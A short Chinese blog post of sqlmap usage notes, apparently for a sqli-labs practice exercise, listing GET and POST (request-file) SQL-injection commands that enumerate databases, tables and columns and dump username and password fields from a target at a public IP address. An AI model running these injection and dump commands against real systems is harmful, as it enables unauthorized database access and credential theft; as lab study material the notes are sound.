sqlmap用法

于 2023-09-02 14:03:38 发布
阅读量73 收藏
点赞数
文章标签: java 数据库 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69374202/article/details/130781529
版权

拖数据库(用的第一种方法指定url)

sqlmap -u http://47.108.235.197:99/labs/Less-1/?id=1 --dbs

拖blog 数据库的表

sqlmap -u "http://47.108.235.197:99/labs/Less-1/?id=1" -D "blog" --tables


 

拖users表的字段

sqlmap -u "http://47.108.235.197:99/labs/Less-1/?id=1" -D "blog" -T "users" --columns

拖出指定字段数据

sqlmap -u "http://47.108.235.197:99/labs/Less-1/?id=1" -D "blog" -T "users" -C "username,password" --dump


 

二、post 方式注入(方式二)

拖库

把请求参数都放进winidows 文件夹中,再复制进kali ,kali 的命令为sqlmap -r 文件路径

拖数据库 sqlmap -r /home/p-0p-0/post3.txt --dbs

拖表名

sqlmap -r /home/p-0p-0/post3.txt -D "blog" --tables

拖字段

sqlmap -r /home/p-0p-0/post3.txt -D "blog" -T "users" --columns

拖数据

sqlmap -r /home/p-0p-0/post3.txt -D "blog" -T "users" -C "username,password" --dump

幻境512
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
SQLMAP使用方法详解
Sys1em32 安全之路
03-11 434
一共有11种常见SQLmap使用方法: 一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win:python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" Linux :.lmap.py -u "http://www.xxx.com/en/Com...
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap使用方法
天上掉馅饼
02-25 1040
sqlmap使用方法
Sqlmap 使用方法小结
热门推荐
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
SQLMAP的使用
最新发布
m0_58001548的博客
04-03 3571
SQLmap 是一款用来检测与利用 SQL 注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官方网站下载 http://sqlmap.org/
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3254
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
sqlmap 使用方法
ilkj的博客
05-20 587
sqlmap 使用方法 Usage: python3 sqlmap [options] Options: -h, --help Show basic help message and exit(显示基本帮助信息并退出) -hh Show advanced help message and exit(显示高级帮助信息并退出) --version Show program's version number and ex
sqlmap使用方法笔记
04-21
网络安全攻防工具 sqlmap 使用方法笔记,包括攻击实例和使用简介,是听课程做的笔记,适合初学者
Web应用安全:Sqlmap用法介绍.pptx
06-20
Sqlmap用法介绍 搭建phpStudy站点 搭建DVWA 2. Sqlmap SQL注入演示 搭建phpStudy phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可...
Sqlmap用法详解
12-02
非常使用的Sqlmap使用方法详细介绍,欢迎大家下载学习
Web应用安全:Sqlmap用法介绍(实验).docx
06-20
Sqlmap 用法介绍 一、实验目的 掌握Sqlmap的相关知识; 熟悉Sqlmap工具的使用; 掌握SQL注入的相关知识; 熟悉Web站点的搭建。 二、实验内容 安装Sqlmap; 搭建phpStudy站点并开启apache服务器和MySQL数据库; 在...
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
sqlmap使用介绍
06-22
详细分析了sqlmap工作原理,指令使用方法,并给出常用示例
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap的使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值